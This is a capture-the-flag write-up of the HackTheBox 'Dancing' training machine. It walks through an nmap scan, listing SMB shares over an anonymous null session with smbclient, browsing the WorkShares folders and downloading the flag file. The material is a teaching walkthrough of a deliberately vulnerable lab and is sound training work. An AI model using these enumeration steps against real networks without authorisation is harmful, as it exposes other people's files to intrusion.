← back to writeups
platform HackTheBox
difficulty Easy (Starting Point)

Machine: https://app.hackthebox.com/starting-point

---

Dancing is a Windows Starting Point machine built around one of the most common misconfigurations in enterprise environments: an SMB file share with anonymous access enabled. No exploit, no brute force — just knowing which tools to use and understanding why custom shares are more interesting than the default ones Windows always creates.

Reconnaissance

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV $TARGET_IP

Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-15 15:21 UTC
Nmap scan report for $TARGET_IP
Host is up (0.034s latency).

PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 10 Microsoft-DS
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time:
|   date: 2026-08-15T19:21:03
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap done: 1 IP address (1 host up) scanned in 14.03 seconds

Ports 139 and 445 confirm SMB is running. Port 5985 is WinRM — useful for lateral movement on other machines, not relevant here. SMB signing is enabled but not required, meaning connections without signing are accepted.

SMB Enumeration

List available shares without supplying a password. The -N flag sends a null session — equivalent to anonymous access:

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ smbclient -L $TARGET_IP -N

	Sharename     Type    Comment
	---------     ----    -------
	ADMIN$        Disk    Remote Admin
	C$            Disk    Default share
	IPC$          IPC     Remote IPC
	WorkShares    Disk
SMB1 disabled -- no workgroup available

ADMIN$, C$, and IPC$ are default administrative shares present on every Windows machine — they require credentials. WorkShares is a custom share with no comment, making it the target.

Initial Access

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ smbclient //$TARGET_IP/WorkShares -N

Try "help" to get a list of possible commands.
smb: \> ls

  .                                   D        0  Mon Mar 29 10:22:01 2021
  ..                                  D        0  Mon Mar 29 10:22:01 2021
  Amy.J                               D        0  Mon Mar 29 10:03:59 2021
  James.P                             D        0  Thu Jun  3 10:38:03 2021

		5114111 blocks of size 4096. 1733480 blocks available

smb: \> cd Amy.J
smb: \Amy.J\> ls

  .                                   D        0  Mon Mar 29 10:03:59 2021
  ..                                  D        0  Mon Mar 29 10:03:59 2021
  worknotes.txt                       A       57  Mon Mar 29 10:19:37 2021

		5114111 blocks of size 4096. 1733480 blocks available

smb: \Amy.J\> cd ..
smb: \> cd James.P
smb: \James.P\> ls

  .                                   D        0  Thu Jun  3 10:38:03 2021
  ..                                  D        0  Thu Jun  3 10:38:03 2021
  flag.txt                            A       32  Mon Mar 29 10:26:54 2021

		5114111 blocks of size 4096. 1733480 blocks available

smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \James.P\> bye

Inside an smbclient session, navigation uses SMB-native commands — ls, cd, get, put. Standard Linux commands like cat do not work here.

Flag

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ cat flag.txt
$FLAG

Key Takeaways

  • smbclient -L lists shares. -N sends no password — always try this first on port 445 before assuming credentials are required.
  • ADMIN$, C$, and IPC$ are always present on Windows but rarely accessible without credentials. Custom shares with informal names are where misconfigurations live.
  • Inside smbclient the commands are SMB-native: ls, cd, get, bye. Standard Linux shell commands do not work within the session.
  • Anonymous SMB access is a critical misconfiguration. In a real network it exposes internal documents, scripts, and credential files to anyone on the segment.

References